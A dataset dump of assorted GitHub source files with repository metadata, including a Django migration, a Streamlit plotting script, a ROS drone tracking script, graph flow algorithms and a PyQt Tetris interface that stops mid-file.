blob_id stringlengths 40 40 | directory_id stringlengths 40 40 | path stringlengths 3 281 | content_id stringlengths 40 40 | detected_licenses listlengths 0 57 | license_type stringclasses 2 values | repo_name stringlengths 6 116 | snapshot_id stringlengths 40 40 | revision_id stringlengths 40 40 | branch_name stringclasses 313 values | visit_date timestamp[us] | revision_date timestamp[us] | committer_date timestamp[us] | github_id int64 18.2k 668M ⌀ | star_events_count int64 0 102k | fork_events_count int64 0 38.2k | gha_license_id stringclasses 17 values | gha_event_created_at timestamp[us] | gha_created_at timestamp[us] | gha_language stringclasses 107 values | src_encoding stringclasses 20 values | language stringclasses 1 value | is_vendor bool 2 classes | is_generated bool 2 classes | length_bytes int64 4 6.02M | extension stringclasses 78 values | content stringlengths 2 6.02M | authors listlengths 1 1 | author stringlengths 0 175 |
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
49d6d7963eb1e7251d939d8c77a74178713656ce | 9148efb07cb949e686b8c1017460526b74c16319 | /topic/migrations/0001_initial.py | be704877ef5a83f8ba906836a1463a856f940208 | [] | no_license | kangsgo/pineapple | af5277144395135bc018552bcef2237a8c1cd011 | d6f95eb1cf3cc30d97157a9b6fe35ad1889f6a82 | refs/heads/master | 2021-01-12T15:52:03.496417 | 2016-10-06T11:47:59 | 2016-10-06T11:47:59 | 70,171,425 | 1 | 0 | null | 2016-10-06T16:20:18 | 2016-10-06T16:20:18 | null | UTF-8 | Python | false | false | 1,422 | py | # -*- coding: utf-8 -*-
# Generated by Django 1.9.6 on 2016-05-13 05:09
from __future__ import unicode_literals
from django.conf import settings
from django.db import migrations, models
class Migration(migrations.Migration):
    # Auto-generated initial migration (Django 1.9.6): creates the FoodTopic
    # model with M2M links to comments, foods and the user model.
    initial = True
    dependencies = [
        ('comments', '0001_initial'),
        migrations.swappable_dependency(settings.AUTH_USER_MODEL),
        ('food', '0001_initial'),
    ]
    operations = [
        migrations.CreateModel(
            name='FoodTopic',
            fields=[
                ('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
                ('title', models.CharField(max_length=32, verbose_name='专题名称')),
                ('comments', models.ManyToManyField(blank=True, to='comments.Comment', verbose_name='专题评论')),
                ('foods', models.ManyToManyField(to='food.Food', verbose_name='美食')),
                ('users_collect', models.ManyToManyField(blank=True, related_name='topics_collected', to=settings.AUTH_USER_MODEL, verbose_name='收藏的用户')),
                ('users_like', models.ManyToManyField(blank=True, related_name='topics_liked', to=settings.AUTH_USER_MODEL, verbose_name='点赞用户')),
            ],
            options={
                'verbose_name': '美食专题',
                'verbose_name_plural': '美食专题',
            },
        ),
    ]
| [
"tonnie.lwt@gmail.com"
] | tonnie.lwt@gmail.com |
1c1ae64bcd0ef9585b622bcc72dcfe53e29a844d | 733a9f7fb141db20c9286e6971d59dc22f1a96c3 | /plot.py | 18aa40480148505fe7216e4af38773a4457eac1f | [] | no_license | MartinBCN/DeepRL | ca888dfe1a22a65abc597f34bd933965d2f86872 | 8394a373936a6fc1b77c1fb6762371f70bac8a1f | refs/heads/main | 2023-04-20T07:34:21.619209 | 2021-05-16T13:07:39 | 2021-05-16T13:07:39 | 361,625,863 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,499 | py | import streamlit as st
st.set_page_config(page_title='RL Reacher', page_icon=None, layout='wide')
import pandas as pd
import json
from pathlib import Path
import numpy as np
import plotly_express as px

# Collect per-run configs and training logs from the run directories.
p = Path('runs/reacher')
batch = pd.DataFrame()
epoch = pd.DataFrame()
configs = pd.DataFrame()
for path in p.glob('run*'):
    run = path.name
    # --- Configs ---
    with open(path / 'config.json', 'r') as data:
        config = json.load(data)
    next_configs = {'Run': [run], 'Hidden Layer': [config['actor']['hidden_layers']],
                    'Layer Norm': [config['actor']['batch_norm']], 'Dropout': [config['actor']['dropout']]}
    configs = pd.concat([configs, pd.DataFrame(next_configs)])
    # --- Logs ---
    try:
        with open(path / 'logs.json', 'r') as data:
            logs = json.load(data)
        next_batch = pd.DataFrame(logs['batch'])
        next_batch['Batch'] = np.arange(len(next_batch))
        next_epoch = pd.DataFrame(logs['epoch'])
        next_epoch['Epoch'] = np.arange(len(next_epoch))
        next_epoch['ScoreRolling'] = next_epoch['score'].rolling(100).mean()
        next_epoch['Run'] = run
        batch = pd.concat([batch, next_batch])
        epoch = pd.concat([epoch, next_epoch])
    except (OSError, ValueError, KeyError):
        # Skip runs whose logs are missing, malformed JSON, or incomplete.
        # (Was a bare `except: pass`, which also hid programming errors.)
        pass
col1, col2 = st.beta_columns(2)
# NOTE(review): assumes the epoch logs contain a "Mean Score" column — confirm.
fig = px.line(epoch, x="Epoch", y="Mean Score", color='Run')
fig.write_html('figures/mean_score.html')
col1.write(fig)
fig = px.line(epoch, x="Epoch", y="score", color='Run')
col2.write(fig)
| [
"martin-cleven@gmx.net"
] | martin-cleven@gmx.net |
6df584caf2711d3e2e7ace2cad2cdc746637d3a9 | 7f591f2c5921a35b1ee86c134e6f76ccbe91eb53 | /login/app/forms.py | 24d77e0c69aec135095db84b303528e5728b3b66 | [] | no_license | prashanthchaduvala/Myproject | cb91f7a6701927a847043c08f0512bc5f8deb2b4 | 2fa04185e7b53154e6b132ed28dfc462cc267929 | refs/heads/master | 2020-09-26T14:33:54.331103 | 2019-12-06T07:59:07 | 2019-12-06T07:59:07 | 226,274,400 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 202 | py | from django import forms
from .models import loginpage
class LoginForm(forms.ModelForm):
    """ModelForm exposing every field of the loginpage model."""
    class Meta:
        model=loginpage
        fields='__all__'
        widgets={'password':forms.PasswordInput}  # mask the password field
"54631863+prashanthchaduvala@users.noreply.github.com"
] | 54631863+prashanthchaduvala@users.noreply.github.com |
667786d0de27d6e59c028abbd242e1f9687c6d97 | c1a7a020f950e0e80f4b63793eae458a068ed552 | /src/uav_flight/src/python/drone_hunter.py | 806a5ef803b938f65095be34991906460435d4e7 | [] | no_license | Isaac-Seslar/uav_avoidance | 504c4c244a8ae5a1da151f270fa6aa1103400ddb | 5dbef1c9eb527a267f5afd9996a576043413b952 | refs/heads/master | 2023-01-05T04:15:09.082301 | 2020-10-29T16:46:46 | 2020-10-29T16:46:46 | 265,355,340 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 6,564 | py | #! /usr/bin/python
####################
# Import libraries #
####################
import math
import numpy as np
import rospy
import mavros
import std_msgs
import tf
import sys, select, os, tty, termios
from geometry_msgs.msg import PoseStamped, TwistStamped, TransformStamped, Point, Vector3
from mavros_msgs.msg import GlobalPositionTarget, State
from mavros_msgs.srv import CommandBool, SetMode, CommandTOL
# Personal def
# from Common_Functions import *
# from Safe_Controller import *
# from Performance_Controller import *
#############
# Class Def #
#############
class obs_obj:
    """Module-level cache of the latest obstacle positions (from Vicon)."""
    obs_l = Vector3()  # large obstacle translation
    obs_s = Vector3()  # small obstacle translation
class quad_obj:
    """Module-level cache of the quad's latest pose, velocity and FCU state."""
    vehicle = Point()  # latest local position
    float_x = float()
    float_y = float()
    float_z = float()
    vehicle_dot = Vector3()  # latest linear velocity
    float_xdot = float()
    float_ydot = float()
    float_zdot = float()
    state = State()  # latest MAVROS state (mode, armed flag, ...)
# Shared command/goal messages reused by the mission loop and service calls.
quad_goal = PoseStamped()
offb_set_mode = SetMode()
arm_cmd = CommandBool()
takeoff_cmd = CommandTOL()
landing_cmd = CommandTOL()
###############
# Definitions #
###############
# Actively watches for keypress #
#################################
def getch():
    """Read one character from stdin in raw mode, restoring terminal settings."""
    stdin_fd = sys.stdin.fileno()
    saved_attrs = termios.tcgetattr(stdin_fd)
    try:
        tty.setraw(stdin_fd)
        key = sys.stdin.read(1)
        return key
    finally:
        # Always restore the terminal, even if the read raises.
        termios.tcsetattr(stdin_fd, termios.TCSADRAIN, saved_attrs)
# Tolerance function #
######################
def isclose(a, b, rel_tol=1e-09, abs_tol=0.0):
    """Return True if a and b are within the given relative/absolute tolerance.

    Same contract and formula as math.isclose (PEP 485), to which this now
    delegates instead of re-implementing it by hand.
    """
    return math.isclose(a, b, rel_tol=rel_tol, abs_tol=abs_tol)
# Callback functions for local pose #
#####################################
def pose_callback(msg):
    """Cache the quad's local position, both as a Point and as plain floats."""
    position = msg.pose.position
    quad_obj.vehicle.x = position.x
    quad_obj.vehicle.y = position.y
    quad_obj.vehicle.z = position.z
    quad_obj.float_x = float(position.x)
    quad_obj.float_y = float(position.y)
    quad_obj.float_z = float(position.z)
def velocity_callback(msg):
    """Cache the quad's linear velocity, both as a Vector3 and as plain floats."""
    linear = msg.twist.linear
    quad_obj.vehicle_dot.x = linear.x
    quad_obj.vehicle_dot.y = linear.y
    quad_obj.vehicle_dot.z = linear.z
    quad_obj.float_xdot = float(linear.x)
    quad_obj.float_ydot = float(linear.y)
    quad_obj.float_zdot = float(linear.z)
def obs_l_callback(msg):
    # Latest large-obstacle translation from the Vicon transform.
    obs_obj.obs_l = msg.transform.translation
def obs_s_callback(msg):
    # Latest small-obstacle translation from the Vicon transform.
    obs_obj.obs_s = msg.transform.translation
def state_callback(st_msg):
    # Latest MAVROS flight-controller state (mode, armed flag, ...).
    quad_obj.state = st_msg
# Generates waypoints for the quadrotor to follow #
###################################################
def mission():
    """Continuously steer the quad toward the small obstacle.

    Each iteration reads the latest cached obstacle/vehicle poses, asks
    Performance_Controller for the next waypoint, publishes it as a
    position setpoint at 1 m altitude, and sleeps at the loop rate.
    Runs until ROS shuts down.

    (Dead pre-loop code from the original — obstacle_list, current_mode,
    safe_complete, cur_wpt, x_rta, y_rta, char — was never used and has
    been removed; loop behavior is unchanged.)
    """
    while not rospy.is_shutdown():
        # Current target: the small obstacle's ground-plane position.
        small_obs = np.array([obs_obj.obs_s.x, obs_obj.obs_s.y])
        wpt = Performance_Controller(quad_obj.vehicle.x, quad_obj.vehicle.y, small_obs)
        quad_obj.quad_goal.pose.position.x = wpt[0]
        quad_obj.quad_goal.pose.position.y = wpt[1]
        quad_obj.quad_goal.pose.position.z = 1  # hold 1 m altitude
        setpnt_pub.publish(quad_obj.quad_goal)
        rate.sleep()
def Performance_Controller(vehicle_x, vehicle_y, target):
    """Return the next waypoint, stepping along the line toward `target`.

    Moves along the straight line from (vehicle_x, vehicle_y) to `target`,
    advancing at most `step` (1.0 m) in x per call without overshooting;
    y follows the line. Returns np.array([x_next, y_next]).

    Fix: the original divided by (target[0] - vehicle_x) unconditionally
    and raised ZeroDivisionError when the target was straight ahead in y;
    that case now steps along y instead.
    """
    step = 1.0
    dx = target[0] - vehicle_x
    if dx == 0:
        # Vertical line: step up to `step` along y toward the target.
        dy = target[1] - vehicle_y
        y_step = np.sign(dy) * min(abs(dy), step)
        return np.array([vehicle_x, vehicle_y + y_step])
    slope = (target[1] - vehicle_y) / dx
    direction = np.sign(dx)
    x_next = vehicle_x + direction * step
    if direction > 0 and x_next < target[0]:
        x_dif = step
    elif direction > 0 and x_next >= target[0]:
        x_dif = dx  # closer than one step: land exactly on the target x
    elif direction < 0 and x_next > target[0]:
        x_dif = -step
    else:
        x_dif = dx
    return np.array([vehicle_x + x_dif, vehicle_y + slope * x_dif])
#########
# Start #
#########
if __name__ == '__main__':
    # Node setup (Python 2 / rospy). Publishes setpoints at 50 Hz.
    rospy.init_node('RTA_Gate', anonymous=False)
    rate = rospy.Rate(50)
    # Time setup
    now = rospy.Time.now()
    zero_time = rospy.Time()
    # Subscribers
    state_sub = rospy.Subscriber('/mavros1/state', State, state_callback, queue_size=10)
    quad_pose_sub = rospy.Subscriber('/mavros1/local_position/pose', PoseStamped,
                                     pose_callback, queue_size=10)
    velo_sub = rospy.Subscriber('/mavros1/local_position/velocity', TwistStamped,
                                velocity_callback, queue_size=10)
    obs_l_pose_sub = rospy.Subscriber('/vicon/obs_l/obs_l', TransformStamped,
                                      obs_l_callback, queue_size=10)
    obs_s_pose_sub = rospy.Subscriber('/vicon/obs_s/obs_s', TransformStamped,
                                      obs_s_callback, queue_size=10)
    # Publishers
    setpnt_pub = rospy.Publisher('/mavros1/setpoint_position/local', PoseStamped, queue_size=10)
    # velocity_pub = rospy.Publisher('/mavros/setpoint_velocity/cmd_vel', TwistStamped, queue_size=10)
    # local_position = rospy.Publisher('/mavros/local_position/pose', PoseStamped)
    # Services
    setmod_serv = rospy.ServiceProxy('/mavros1/set_mode', SetMode)
    arming_serv = rospy.ServiceProxy('/mavros1/cmd/arming', CommandBool)
    takeoff_serv = rospy.ServiceProxy('/mavros1/cmd/takeoff', CommandTOL)
    landing_serv = rospy.ServiceProxy('/mavros1/cmd/land', CommandTOL)
    print "Track?"
    choice = raw_input('yes or no: ')
    if choice=='no' or choice=='n':
        quit()
    elif choice=='yes' or choice=='y':
        # Stream setpoints while waiting for the pilot to switch to OFFBOARD;
        # then arm (if needed), command a 1 m climb, and hand off to mission().
        while not rospy.is_shutdown():
            setpnt_pub.publish(quad_obj.quad_goal)
            rate.sleep()
            if quad_obj.state.mode=="OFFBOARD":
                if not quad_obj.state.armed==True:
                    print "Arming..."
                    rospy.wait_for_service('/mavros1/cmd/arming')
                    arming_serv(True)
                    rospy.sleep(2)
                print "Taking Off..."
                quad_obj.quad_goal.pose.position.x = quad_obj.vehicle.x
                quad_obj.quad_goal.pose.position.y = quad_obj.vehicle.y
                quad_obj.quad_goal.pose.position.z = 1
                # Publish the takeoff setpoint for ~4 s (200 cycles at 50 Hz).
                for i in range(200):
                    setpnt_pub.publish(quad_obj.quad_goal)
                    rate.sleep()
                break
    print "mission start"
    mission()
"isaaciscool19@gmail.com"
] | isaaciscool19@gmail.com |
a1a897e0a9c3bc5db171865931e925f1a2a52b18 | 8195596a47e5d47ec78b585d5ed4b1a9583f61f7 | /app.py | 1611a2b6eae0dd07fc9bf0c583d9d41aeb8e9ddf | [] | no_license | acoustically/EchoetServer | 8f5b92a9dff31c2177f0e9b6b700ad257e478447 | 454b90105c87dba04ca3fcfb74466211def94ab7 | refs/heads/master | 2021-07-20T12:03:32.073197 | 2017-10-29T00:04:20 | 2017-10-29T00:04:20 | 108,533,779 | 0 | 1 | null | 2017-10-28T09:48:45 | 2017-10-27T10:40:26 | Python | UTF-8 | Python | false | false | 858 | py | from flask import Flask, request, jsonify, render_template
from src.routes.daily_eat import daily_eat
from src.routes.user import user
from src.routes.food import food
from src.routes.user_body import user_body
app = Flask(__name__)
# Mount the feature blueprints under their URL prefixes.
app.register_blueprint(user, url_prefix="/user")
app.register_blueprint(daily_eat, url_prefix="/daily-eat")
app.register_blueprint(food, url_prefix="/food")
app.register_blueprint(user_body, url_prefix="/user-body")
@app.route("/")
def index():
return render_template("index.html")
@app.route("/user_list")
def user_list():
return render_template("user_list.html")
@app.route("/user_comments")
def user_comments():
return render_template("user_comments.html")
@app.route("/food_list")
def food_list():
return render_template("food_list.html")
if __name__ == "__main__":
app.run(host="0.0.0.0")
| [
"ubuntu@ip-172-31-8-104.ap-northeast-2.compute.internal"
] | ubuntu@ip-172-31-8-104.ap-northeast-2.compute.internal |
44743649534d60a91cc3986c48b9fcb6f15d46bd | 30d61ce0b728f31a830db6b6b1954a32551990b2 | /src/gui_config/custom/util.py | 52c871fa4478b9296be8335390e061416b42f78d | [
"MIT"
] | permissive | hgiesel/anki_set_randomizer | 6755dc8489b703887c55a5427bbbdab858f58a65 | 1a9a22480eb6c0e7f421dc08d36d14920e43dd3e | refs/heads/master | 2022-08-24T05:45:13.339132 | 2020-01-15T17:04:26 | 2020-01-30T13:56:50 | 197,258,760 | 5 | 0 | MIT | 2022-07-20T17:28:42 | 2019-07-16T19:56:27 | JavaScript | UTF-8 | Python | false | false | 90 | py | def mapTruthValueToIcon(b):
    if b:
        return '✓'  # check mark for truthy values
    else:
        return '✗'  # cross mark for falsy values
| [
"hengiesel@gmail.com"
] | hengiesel@gmail.com |
0418b38156676b0628df4bd411124a771259d66b | 3d2cf0037809d77f110a1383df4c42c68614487f | /graphs.py | 57b3b1613cca1ca7ddd95f281503e5497f7d49f7 | [] | no_license | zackbrienza/fantasy-football | 469b0a6895a6227ff6c6019cd7748765860dba5a | d483f319292cc596052c08f9ec56902db861bc8b | refs/heads/master | 2021-09-05T17:05:24.018307 | 2018-01-29T21:29:13 | 2018-01-29T21:29:13 | 109,536,608 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 4,472 | py | #Scott Dickson
#1/3/2018
#Implementations of various graph algorithms
#All take an adjacency list of size n^2 where n is
#the number of vertices in the graph
from Queue import Queue
#Try to find a path fromt the start node to the end node
#If found return a list of edges. Nil will be returned if
#a path cannot be found. if adj[i][j] == 1 then there is a directed
#edge between vertex i and vertex j
def bfs(adj, start, end):
    """Breadth-first search for a path from `start` to `end`.

    `adj` is an n x n adjacency matrix where adj[i][j] == 1 means a
    directed edge i -> j. Returns the path as a list of [u, v] edges,
    or [] if `end` is unreachable (or equals `start`).

    Fixes over the original: nodes are marked visited on enqueue (the
    original marked on dequeue, letting the same node be queued many
    times), and the path is recovered via parent pointers instead of a
    second backward scan of the matrix.
    """
    from collections import deque
    n = len(adj[0])  # number of nodes
    visited = n * [False]
    parent = n * [None]  # BFS-tree predecessor of each visited node
    visited[start] = True
    q = deque([start])
    while q:
        cur = q.popleft()
        if cur == end:
            break
        for nxt in range(n):
            if adj[cur][nxt] == 1 and not visited[nxt]:
                visited[nxt] = True
                parent[nxt] = cur
                q.append(nxt)
    # Path not found
    if not visited[end]:
        return []
    # Recover the edge list by following parent pointers back to start.
    path = []
    cur = end
    while cur != start:
        path.insert(0, [parent[cur], cur])
        cur = parent[cur]
    return path
#Given a graph, edge capacities and the source/sink node
#Generate a maximum flow assignment of flow on each edge
def ford_fulkerson(adj,cap,s,t):
    """Compute a maximum flow from s to t via augmenting paths.

    Repeatedly finds an augmenting path in the residual graph with bfs()
    and pushes flow along it with augment(), until no path remains.
    Returns the n x n flow assignment matrix.
    """
    n = len(adj[0])
    flow = [[0] * n for _ in range(n)]  # no flow on the graph initially
    while True:
        # Look for an augmenting path in the current residual graph.
        aug_path = bfs(makeResidual(adj, flow, cap), s, t)
        if not aug_path:
            # No augmenting path left: the flow is maximum.
            return flow
        flow = augment(adj, flow, cap, aug_path)
#Given a graph, flows and capacities return the residial graph's
#Adjacency list
def makeResidual(adj,flow,cap):
    """Build the residual graph's adjacency matrix for the given flow and capacities."""
    n = len(adj[0])
    res = [[0] * n for _ in range(n)]
    for u in range(n):
        for v in range(n):
            if adj[u][v] != 1:
                continue
            if flow[u][v] > 0:
                res[v][u] = 1  # backward edge: existing flow can be undone
            if flow[u][v] < cap[u][v]:
                res[u][v] = 1  # forward edge: leftover capacity
    return res
#Update the flow after an augmenting path has been found
def augment(adj,flow,cap,path):
    """Push the bottleneck amount of flow along an augmenting path.

    `path` is a list of [head, tail] residual edges. For a forward edge
    (adj[head][tail] == 1) the residual capacity is cap - flow; for a
    backward edge (adj[tail][head] == 1) it is the flow currently on the
    real edge tail -> head. Returns the updated flow matrix.

    Fix: the original read/updated flow[head][tail] for backward edges,
    which is always 0 there, so backward augmentation pushed zero flow
    and ford_fulkerson could loop forever; it now uses flow[tail][head].
    """
    # First pass: find the bottleneck (smallest residual capacity on the path).
    min_diff = 0
    for head, tail in path:
        if adj[head][tail] == 1:
            diff = cap[head][tail] - flow[head][tail]
        elif adj[tail][head] == 1:
            # Backward edge: we can cancel up to the flow on the real edge.
            diff = flow[tail][head]
        else:
            continue
        if min_diff == 0 or min_diff > diff:
            min_diff = diff
    # Second pass: add/subtract min_diff on each edge of the path.
    for head, tail in path:
        if adj[head][tail] == 1:
            flow[head][tail] += min_diff
        elif adj[tail][head] == 1:
            flow[tail][head] -= min_diff
    return flow
#Graph class for easy use and testing
class Graph:
    """Small adjacency-matrix graph with per-edge capacities, for easy testing."""
    def __init__(self):
        self.n = 0
        self.adj = []
        self.cap = []
    def setNodes(self, num):
        """Resize the graph to `num` vertices, clearing all edges."""
        self.n = num
        self.adj = [[0] * num for _ in range(num)]
        self.cap = [[0] * num for _ in range(num)]
    def add_edge(self, start, end, c=1):
        """Add a directed edge start -> end with capacity c (default 1)."""
        self.adj[start][end] = 1
        self.cap[start][end] = c
    def getAdj(self):
        """Return the adjacency matrix."""
        return self.adj
    def getCap(self):
        """Return the capacity matrix."""
        return self.cap
if __name__ == '__main__':
    # Build the demo flow network from (start, end, capacity) triples.
    g = Graph()
    g.setNodes(7)
    for u, v, c in [(0, 1, 3), (0, 2, 5), (1, 3, 1), (2, 3, 2), (1, 4, 5),
                    (3, 4, 1), (3, 5, 3), (2, 5, 2), (4, 6, 7), (5, 6, 3)]:
        g.add_edge(u, v, c)
    print("Adjacency array:")
    print(g.getAdj())
    print("Capacity array:")
    print(g.getCap())
    # Max flow from source 0 to sink 6.
    print("Max flow array:")
    print(ford_fulkerson(g.getAdj(), g.getCap(), 0, 6))
| [
"sdd48@cornell.edu"
] | sdd48@cornell.edu |
4c05a7c1bbc996ad2ea1c67b8c197f53b49ee881 | cf84ec58efa63846d09592a6b3d98f9ba31aba0a | /day01/Interaction.py | 3543fe16091c1ade96d5a645c2634d360ee4d799 | [] | no_license | EvanMi/s14 | cedd3837d0bb87209a31e17467fc723c3b4d7041 | 186d3a471bfc5ac4edc888d1b2d0b65206b62803 | refs/heads/master | 2020-03-30T07:34:47.382925 | 2018-09-30T08:55:10 | 2018-09-30T08:55:10 | 150,950,275 | 2 | 0 | null | null | null | null | UTF-8 | Python | false | false | 624 | py | # -*- coding:utf-8 -*-
# Author: Evan Mi
# Interactive demo: read user details and print them with three string
# formatting styles (%-interpolation, named .format, positional .format).
name = input("name:")
age = int(input("age:"))  # must be numeric; int() raises on bad input
job = input("job:")
salary = input("salary:")
# %s %f %d
info = '''
---------- info of %s --------
Name: %s
Age: %d
Job: %s
Salary: %s
''' % (name, name, age, job, salary)
# Same output via str.format with named placeholders.
info2 = '''
---------- info of {_name} --------
Name: {_name}
Age: {_age}
Job: {_job}
Salary: {_salary}
'''.format(_name=name, _age=age, _job=job, _salary=salary)
# Same output via str.format with positional indices.
info3 = '''
---------- info of {0} --------
Name: {0}
Age: {1}
Job: {2}
Salary: {3}
'''.format(name, age, job, salary)
print(info)
print(info2)
print(info3)
'''the type of age'''
print(type(age))  # confirms age was converted to int
| [
"1157015566@qq.com"
] | 1157015566@qq.com |
aa5c179f6a82ed1c371e89ee709949f9a08fcf6f | 7c42e938f896729b04ebb19ed6222083841c66c0 | /tetris/ui.py | a5ac41cc480f2429c5eb5ada0397dd2533269c2d | [
"MIT"
] | permissive | xmye/games | 6586805d94b452a604fe977773a7a1402e704930 | 4239022cf4f144dbf22b46baf51368a408faa97b | refs/heads/master | 2021-04-03T08:56:26.637072 | 2018-03-05T22:01:33 | 2018-03-06T22:01:22 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 9,653 | py | from PyQt5.QtCore import Qt, QTimer, QSize, QPointF, QRectF, QPropertyAnimation, QEasingCurve, \
QParallelAnimationGroup, QAbstractAnimation
from PyQt5.QtWidgets import QWidget, QFrame, QMessageBox, QGraphicsScene, QGraphicsView, \
QGraphicsObject, QGridLayout, QStyleOptionGraphicsItem, \
QGraphicsSceneMouseEvent, QGraphicsSceneWheelEvent
from PyQt5.QtGui import QPainter, QPen, QBrush, QColor, QTransform, QResizeEvent, QKeyEvent
from typing import Union
from tetris import Tetris
class QTetris(QWidget):
    """Qt front end for the Tetris model: scene, view, and animated tiles."""
    class QTile(QGraphicsObject):
        """Graphics item for one tile; receives model callbacks and animates them."""
        # Fill colour for each tetrimino type.
        colorMap = {Tetris.I: QColor("#53bbf4"), Tetris.J: QColor("#e25fb8"),
                    Tetris.L: QColor("#ffac00"), Tetris.O: QColor("#ecff2e"),
                    Tetris.S: QColor("#97eb00"), Tetris.T: QColor("#ff85cb"),
                    Tetris.Z: QColor("#ff5a48")}
        def __init__(self, qTetris: 'QTetris', tetrimino: Tetris.Tetrimino, tile: Tetris.Tile):
            """Create the item, register as the model tile's delegate, add to scene."""
            super(QTetris.QTile, self).__init__()
            tile.delegate = self
            self.color = self.colorMap[type(tetrimino)]
            self.qTetris = qTetris
            self.moveAnimation = QParallelAnimationGroup()
            self.dropAnimation = QPropertyAnimation(self, b'pos')
            self.collapseAnimation = QPropertyAnimation(self, b'pos')
            self.shiftAnimation = QPropertyAnimation(self, b'pos')
            # When the collapse animation finishes, notify the model tile.
            self.collapseAnimation.finished.connect(lambda tl=tile: tile.delegate.disappeared(tl))
            self.qTetris.scene.addItem(self)
            self.setPos(QPointF(0, 4))
            self.moved(tile)
        def moved(self, tile: Tetris.Tile):
            """Animate translation and rotation to the tile's new grid cell."""
            translation = QPropertyAnimation(self, b'pos')
            start, end = self.pos(), QPointF(tile.row, tile.column)
            curve, speed, delay = QEasingCurve.OutBack, 1 / 50, -1
            self.animate(translation, start, end, curve, speed, delay)
            rotation = QPropertyAnimation(self, b'rotation')
            start, end = self.rotation(), tile.rotation
            curve, speed, delay = QEasingCurve.OutBack, 1, -1
            self.animate(rotation, start, end, curve, speed, delay)
            # Keep the rotation in lock-step with the translation.
            rotation.setDuration(translation.duration())
            self.moveAnimation.clear()
            self.moveAnimation.addAnimation(translation)
            self.moveAnimation.addAnimation(rotation)
            self.moveAnimation.start()
        def dropped(self, tile: Tetris.Tile):
            """Animate a bouncing hard-drop to the tile's landing cell."""
            start, end = self.pos(), QPointF(tile.row, tile.column)
            curve, speed, delay = QEasingCurve.OutBounce, 1 / 50, 0
            self.animate(self.dropAnimation, start, end, curve, speed, delay)
        def collapsed(self, tile: Tetris.Tile):
            """Animate the tile sliding far past the last column when its row clears."""
            start, end = self.pos(), QPointF(tile.row, tile.column + 2 * tile.tetris.num_columns)
            curve, speed, delay = QEasingCurve.InOutExpo, 1 / 50, 800
            if self.dropAnimation.state() == QAbstractAnimation.Running:
                # Chain after an in-flight drop so we leave from the landing spot.
                start = self.dropAnimation.endValue()
            self.animate(self.collapseAnimation, start, end, curve, speed, delay)
        def shifted(self, tile: Tetris.Tile):
            """Animate the tile to its updated grid cell (with a bounce, after a delay)."""
            start, end = self.pos(), QPointF(tile.row, tile.column)
            curve, speed, delay = QEasingCurve.OutBounce, 1 / 100, 1200
            if self.dropAnimation.state() == QAbstractAnimation.Running:
                start = self.dropAnimation.endValue()
            self.animate(self.shiftAnimation, start, end, curve, speed, delay)
        def disappeared(self, tile: Tetris.Tile):
            """Remove the item from the scene once the tile is gone."""
            self.qTetris.scene.removeItem(self)
        def paint(self, painter: QPainter, styleOption: QStyleOptionGraphicsItem, widget: QWidget=None):
            """Draw the tile as a filled unit square centred on the item origin."""
            pen = QPen()
            pen.setWidthF(0.05)
            pen.setColor(Qt.darkGray)
            painter.setPen(pen)
            brush = QBrush()
            brush.setColor(self.color)
            brush.setStyle(Qt.SolidPattern)
            painter.setBrush(brush)
            topLeft = QPointF(0, 0)
            bottomRight = QPointF(1, 1)
            rectangle = QRectF(topLeft, bottomRight)
            rectangle.translate(-0.5, -0.5)
            painter.drawRect(rectangle)
        @staticmethod
        def animate(animation: QPropertyAnimation, start: Union[QPointF, int, float], end: Union[QPointF, int, float],
                    curve: QEasingCurve=QEasingCurve.Linear, speed: float=1 / 50, delay: int=-1):
            """Configure `animation` from start to end; duration = distance / speed.
            delay < 0 leaves it unstarted, 0 starts now, > 0 starts after `delay` ms."""
            animation.setStartValue(start)
            animation.setEndValue(end)
            animation.setEasingCurve(curve)
            if type(start) == type(end) == QPointF:
                distance = (end - start).manhattanLength()
            else:
                distance = abs(end - start)
            animation.setDuration(round(distance / speed))
            if delay == 0:
                animation.start()
            if delay > 0:
                QTimer.singleShot(delay, animation.start)
        def boundingRect(self):
            """Unit square centred on the origin (matches paint())."""
            topLeft = QPointF(0, 0)
            bottomRight = QPointF(1, 1)
            rectangle = QRectF(topLeft, bottomRight)
            rectangle.translate(-0.5, -0.5)
            return rectangle
    class QScene(QGraphicsScene):
        """Board scene: draws the playfield and maps mouse/key input to game moves."""
        def __init__(self, tetris: Tetris):
            super(QTetris.QScene, self).__init__()
            self.tetris = tetris
            # Board outline.
            pen = QPen()
            pen.setWidthF(0.05)
            pen.setColor(Qt.lightGray)
            brush = QBrush(Qt.NoBrush)
            rect = QRectF(0, 0, tetris.num_rows, tetris.num_columns)
            rect.translate(-0.5, -0.5)
            self.setSceneRect(rect)
            self.addRect(rect, pen, brush)
            self.setBackgroundBrush(self.palette().window())
            # Shade every other column to give the board subtle stripes.
            for column in range(0, tetris.num_columns, 2):
                pen = QPen(Qt.NoPen)
                brush = QBrush(Qt.SolidPattern)
                brush.setColor(Qt.lightGray)
                topLeft = QPointF(0, column)
                bottomRight = QPointF(tetris.num_rows, column + 1)
                rectangle = QRectF(topLeft, bottomRight)
                rectangle.translate(-0.5, -0.5)
                self.addRect(rectangle, pen, brush)
        def mouseMoveEvent(self, sceneMouseEvent: QGraphicsSceneMouseEvent):
            """Steer the falling tetrimino toward the mouse's column."""
            mousePoint = sceneMouseEvent.scenePos()
            mouseRow, mouseColumn = round(mousePoint.x()), round(mousePoint.y())
            row, column = self.tetris.falling_tetrimino.row, self.tetris.falling_tetrimino.column
            if mouseColumn - column > 0:
                self.tetris.move_right()
            if mouseColumn - column < 0:
                self.tetris.move_left()
        def mouseReleaseEvent(self, sceneMouseEvent: QGraphicsSceneMouseEvent):
            """Left click drops the piece; right click rotates it."""
            if sceneMouseEvent.button() == Qt.LeftButton:
                self.tetris.drop()
            if sceneMouseEvent.button() == Qt.RightButton:
                self.tetris.rotate()
        def wheelEvent(self, sceneWheelEvent: QGraphicsSceneWheelEvent):
            """A forward wheel tick nudges the piece down one row."""
            if sceneWheelEvent.delta() > 10:
                self.tetris.move_down()
        def keyReleaseEvent(self, sceneKeyEvent: QKeyEvent):
